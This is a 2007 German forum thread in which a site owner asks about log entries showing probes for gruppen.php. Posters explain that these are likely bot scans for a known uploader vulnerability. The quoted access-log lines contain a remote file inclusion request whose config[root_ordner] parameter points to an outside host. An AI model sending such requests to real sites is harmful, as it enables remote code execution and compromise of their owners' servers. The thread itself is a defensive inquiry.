Was macht dieser Code? (gruppen.php?config[root_ord in logfiles gesehen)

#1 Hallöchen,

ich mal wieder.
Folgendes ist ein Ausschnitt aus meinen Error-Logfiles:

Zitat

[Mon Aug 13 05:32:58 2007] [error] [client 62.141.50.122] File does not exist: /is/htdocs/47024/www.meinewebseite.de/links.html//gruppen.php
[Mon Aug 13 05:32:58 2007] [error] [client 62.141.50.122] File does not exist: /is/htdocs/47024/www.meinewebseite.de/404.html
[Mon Aug 13 05:32:58 2007] [error] [client 62.141.50.122] File does not exist: /is/htdocs/47024/www.meinewebseite.de//gruppen.php
[Mon Aug 13 05:32:58 2007] [error] [client 62.141.50.122] File does not exist: /is/htdocs/47024/www.meinewebseite.de/404.html

Mich interessierte natürlich, wieso da jemand oder etwas auf meiner Webseite eine Seite namens gruppen.php sucht.

Also schaute ich in meinen "normalen" Logfiles nach und fand:

Zitat

62.141.50.122 - - [13/Aug/2007:05:32:58 +0200] "GET /links.html//gruppen.php?config[root_ordner]=http://www.xxx.nl/images/ze/2? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.meinewebseite.de"
62.141.50.122 - - [13/Aug/2007:05:32:58 +0200] "GET //gruppen.php?config[root_ordner]=http://www.xxx.nl/images/ze/2? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.meinewebseite.de"

Als neugierig-interessierter Laie habe ich zuerst die IP in NeoTrace eingegeben:
62.141.50.122 = Name: ns.km20231.keymachine.de, Keyweb AG IP Network
(anonym, Tor?)

Danach habe ich www.xxx.nl/ ergoogelt und fand eine normale, niederländische Webseite (Gesundheits-Vereinigung).

Dann habe ich gruppen.php?config[root_ordner] ergoogelt und lese etwas über Bilder-Upload und dass man mit diesem Parameter beliebige Dateien einbinden kann.

Hm, trotzdem sitze ich hier wie ein Fragezeichen und frage mich, was das Ganze jetzt sollte.
Es wäre nett, wenn mich jemand schlauer machen könnte.

#2 Nix du solltest nicht deine Zeit verschwenden.
Was meinst du wieviel Logs ich dir zeigen könnte mit sinnlosen Zeugs drin von irgendwelchen Blindgängern und dummen kiddies.
Willst du damit deine Zeit verbringen dich zu Fragen was andere Leute in ihrer Langeweille alles ausdenken?
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#3 Ne, sorry, ich wollte einfach nur verstehen ... lernen.
Anscheinend bin ich hier im falschen Forum. Nix für ungut.

#4

Zitat

Erin Solos postete
Ne, sorry, ich wollte einfach nur verstehen ... lernen.
Anscheinend bin ich hier im falschen Forum. Nix für ungut.

Es ist nicht das Forum was falsch ist, du suchst etwas was nicht existiert.
Wenn du was lernen willst dann würde ich an deiner Stelle etwas lernen was man gebrauchen kann.
Wenn dein Webserver wirklich so unsicher ist das man über so simple Aufrufe da irgendwas drehen kann würde ich natürlich sofort die Software wechseln außerdem erfährt man über so Exploits etc. auf den entsprechenden Mailinglists alles was man wissen muss.
Der Rest ist wirklich Zeitverschwendung, dass meiste was in den Logs steht ist Müll ich kann dir GB weise logs geben wo irgendwann mal irgendein nap irgendwo irgendwas irgendwie gemacht hat was aber zur keiner Zeit von relevanz war
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#5 Leider hilft mir deine Antwort nicht viel weiter. Ich meine damit; im Grunde genommen bin ich immer noch genau so schlau wie vorher.

Schau mal, du weißt doch gar nicht was ich diesbezüglich schon alles lerne.

Und du weißt auch nicht, weshalb mich das alles interessiert. Für dich mag das Kinderkram sein, ich versuche aber Zusammenhänge zu verstehen und ich habe sicherlich meine Gründe, warum ich momentan so versessen auf meine Logfiles schaue. Ich bin auch kein Mensch der irgendwas ausklammert, mich interessiert einfach alles was mit Webseiten, Programmieren, Internet allgemein, etc. zu tun hat. Wenn ich auf etwas stoße, was ich noch nicht weiß, versuche ich zu lernen.

Und warum? Damit ich eines Tages da so sitzen kann wie du und sagen kann: ach Gottchen Erin, das ist Zeitverschwendung was du da gerade machst.

#6

Zitat

Leider hilft mir deine Antwort nicht viel weiter.

Dann brauchst du gar nicht mehr weiter zu machen, wenn du nichtmal die richtigen Antworten verstehen kannst denn ich habe dir bereits alles Relevante gesagt.

Zitat

Ich bin auch kein Mensch der irgendwas ausklammert, mich interessiert einfach alles was mit Webseiten, Programmieren, Internet allgemein, etc. zu tun hat.

Psychologie triffts eher, oder einfach nur eine Analyse dummer Menschen.

Zitat

Wenn ich auf etwas stoße, was ich noch nicht weiß, versuche ich zu lernen.

Na klar, ich verstehe dich aber es gibt auch Dinge die gilt es nicht zu lernen es sei denn du willst unbedingt verstehen warum ein Kiddie von Morgens bis Abends mit irgendnem Portscanner das Net durchkämmt aber die Beweggründe kenne ich und sie sind nicht auf meinem Niveau oder ich bin zu Alt für sowas

Zitat

Und warum? Damit ich eines Tages da so sitzen kann wie du und sagen kann: ach Gottchen Erin, das ist Zeitverschwendung was du da gerade machst.

Und wenn du noch schlauer bist hörst du auf diejenigen die mehr Ahnung als du selbst haben, so vergeudest du keine Zeit mit unwichtigen Dingen und kommst weiter als die die vor dir waren da du nicht ohne Hilfe komplett alles von vorne lernen musst.
Dafür gibt es so Boards wie dieses hier, aber wenn du keinen Nutzen daraus ziehst - du hast mich gefragt und ich habe dir bereits die Antwort dazu gesagt.
Wenn du was zum lernen suchst, kann ich dir ja Vorschläge machen für etwas das nützlich wäre
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#7 Wenn du gegoogelt hast weißt du ja eigentlich was Sache ist.
Da gibt es momentan Sicherheitsprobleme mit "Mapos-Scripts.de Bilder Uploader"
http://entwickler.de/zonen/portale/psecom,id,250,security,16440,p,0.html

Wenn du diesen Bilderuploader benutzt machst du dir berechtigterweise Sorgen. Wenn nicht, dann brauchst du es mE nicht beachten.

Ich vermute, daß ein Spambot deine Seite besucht hat und checkt, ob deine Seite anfällig ist.
__________
Woher soll ich wissen was ich denke, bevor ich höre was ich sage??
Sag NEIN zu HD+/CI+ - boykottiert die Etablierung von HD+/CI+!

#8 @Xeper

Zitat

Na klar, ich verstehe dich aber es gibt auch Dinge die gilt es nicht zu lernen es sei denn du willst unbedingt verstehen warum ein Kiddie von Morgens bis Abends mit irgendnem Portscanner das Net durchkämmt

Die Kiddies und ihre Beweggründe interessieren mich tatsächlich nicht.

Zitat

Psychologie triffts eher, oder einfach nur eine Analyse dummer Menschen.

Hier werde ich tatsächlich auch schwach ... interessiert mich einfach.

Zitat

Und wenn du noch schlauer bist hörst du auf diejenigen die mehr Ahnung als du selbst haben, so vergeudest du keine Zeit mit unwichtigen Dingen und kommst weiter als die die vor dir waren da du nicht ohne Hilfe komplett alles von vorne lernen musst.
Dafür gibt es so Boards wie dieses hier, aber wenn du keinen Nutzen daraus ziehst - du hast mich gefragt und ich habe dir bereits die Antwort dazu gesagt.

Kennst du das zwiespältige Gefühl zwischen "Ich würde ja gerne alles ungeprüft glauben, weil sich damit Zeit sparen lässt" und "Verdammt, mein Gefühl sagt mir, du solltest hier trotzdem nochmal nachhaken"? - Klar möchte ich aus Eurem Wissen einen Nutzen ziehen, aber eine Situation kann manchmal Umstände aufzeigen, die im Gesamten gesehen eines zweitendrittenvierten Blickes würdig ist. Will sagen, ich hake nur noch aus einem Grund nach: weil ich vor einiger Zeit anonyme Mails erhalten habe (nein, keine dummen Drohungen oder sowas) und seitdem solch merkwürdige Dinge auf meiner Webseite vorgehen.
Ich möchte also nur für mich herausfinden, ob da ein Zusammenhang besteht.

Und solange ich nicht wie ein aufgeschrecktes Huhn ("Hilfe, Hilfe, die Skriptkiddies verfolgen mich") durch die Gegend laufe, ist da einfach die Neugierde einen Zusammenhang zu finden - oder auch nicht. Höre ich mich widerspenstig an? Eigentlich finde ich die Situation irgendwie süß. :-) Habt Ihr alle nicht mal so angefangen? Habt Euch an irgendwas festgebissen und nachgehakt? Habt auf Euren Instinkt gehört? Wolltet es unbedingt herausfinden, auch wenn der Verstand sagt: es gibt Wichtigeres im Leben?

Wie gesagt, mir geht es nicht nur um diesen Code, sondern um das Herausfinden ob ich einen Stalker am Hals habe.

Zitat

Wenn du was zum lernen suchst, kann ich dir ja Vorschläge machen für etwas das nützlich wäre

Ja, gerne.

@HeVTiG
Den Uploader benutze ich tatsächlich nicht. Also okay, beachte ich das nicht weiter.
Na ich warte einfach mal ab, was als Nächstes kommt.

#9

Zitat

, die im Gesamten gesehen eines zweitendrittenvierten Blickes würdig ist. Will sagen, ich hake nur noch aus einem Grund nach: weil ich vor einiger Zeit anonyme Mails erhalten habe (nein, keine dummen Drohungen oder sowas) und seitdem solch merkwürdige Dinge auf meiner Webseite vorgehen.
Ich möchte also nur für mich herausfinden, ob da ein Zusammenhang besteht.

Das kann man dann auch natürlich verstehen, ich sagte ja wenn du Sicherheitsprobleme hast dann SW wechseln etc bzw. dessen nachgehen.
Aber solange es keine Anzeichen gibt lohnt es sich einfach net - außerdem bin ich persönlich sowieso für Prävention.

Zitat

Eigentlich finde ich die Situation irgendwie süß. :-) Habt Ihr alle nicht mal so angefangen? Habt Euch an irgendwas festgebissen und nachgehakt? Habt auf Euren Instinkt gehört? Wolltet es unbedingt herausfinden, auch wenn der Verstand sagt: es gibt Wichtigeres im Leben?

Sagen wir mal so, ich hab einen Instinkt dafür der mir sagt ob etwas wichtig ist oder nicht
Ich schau auch mal ab und zu in die Logs meines Servers nur so, aber das wichtigste ist Prävention - mir passiert meistens sowieso nichts weil alles Bombensicher ist.
Das letzte was ich gepatcht hatte war der BIND9 da es ja eine zurzeit eine dicke Sicherheitslücke gibt.
Dafür bin ich auf den ganzen security mailinglists, wenn etwas wirklich wichtig ist kommt es da zuerst.
Außerdem kann man da die Leute zu einem Thema besser Fragen weil dieses Board für "soetwas" wirklich nicht geeignet ist
Hier findet man nur 100.000x windows Probleme die aber keine Probleme sind, die wirklichen Probleme die werden hier nie thematisiert.

Also wenn du dubiose Mails erhälst und seltsame Dinge auf deiner Webseite vorgehen will ich natürlich nichts gesagt haben, dann bist du ja auch nicht Paranoid sondern hast einen Grund dich umzuschauen.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#10 Hi Xeper,

Zitat

Zitat

Das kann man dann auch natürlich verstehen, ich sagte ja wenn du Sicherheitsprobleme hast dann SW wechseln etc bzw. dessen nachgehen.
Aber solange es keine Anzeichen gibt lohnt es sich einfach net - außerdem bin ich persönlich sowieso für Prävention.

Ich denke, ich bin recht gut abgesichert und habe zudem kein riskantes Surfverhalten ... Ich befürchte ehrlich gesagt auch nicht, dass mir da jemand ein troj. Pferdchen unterjubeln will. Eher sowas wie Brunstverhalten *lach* und geheime Liebesbotschaften und da bin ich ja ganz furchtbar ganz Frau (also neugierig). Allerdings beobachte ich das Ganze mit genügend ernst, damit sich derjenige nicht doch noch als Stalker entpuppt.

Zitat

Sagen wir mal so, ich hab einen Instinkt dafür der mir sagt ob etwas wichtig ist oder nicht

Jahaaa ;-) ich hab' verstanden, du. Nur in puncto heimliche Verehrer werde ich schwach ...

Zitat

Dafür bin ich auf den ganzen security mailinglists, wenn etwas wirklich wichtig ist kommt es da zuerst.
Außerdem kann man da die Leute zu einem Thema besser Fragen weil dieses Board für "soetwas" wirklich nicht geeignet ist

Okay, nächstes Mal an anderer Stelle ...

Zitat

Also wenn du dubiose Mails erhälst und seltsame Dinge auf deiner Webseite vorgehen will ich natürlich nichts gesagt haben, dann bist du ja auch nicht Paranoid sondern hast einen Grund dich umzuschauen.

Ist schon okay, du hast doch auch alles Recht der Welt, deine kritische Meinung Kund zu tun und mir ein wenig den Kopf zu waschen. Ich bin weiß Gott weit davon entfernt, paranoid zu werden und habe ansonsten Besseres zu tun. Aber na ja, du weißt ja, die "Frühlingsgefühle" und die Neugierde ...
Aber das gehört ja wirklich nicht hierher, weshalb ich anfangs nichts davon erwähnte.
Thread schließen? --> Ab in den Eimer?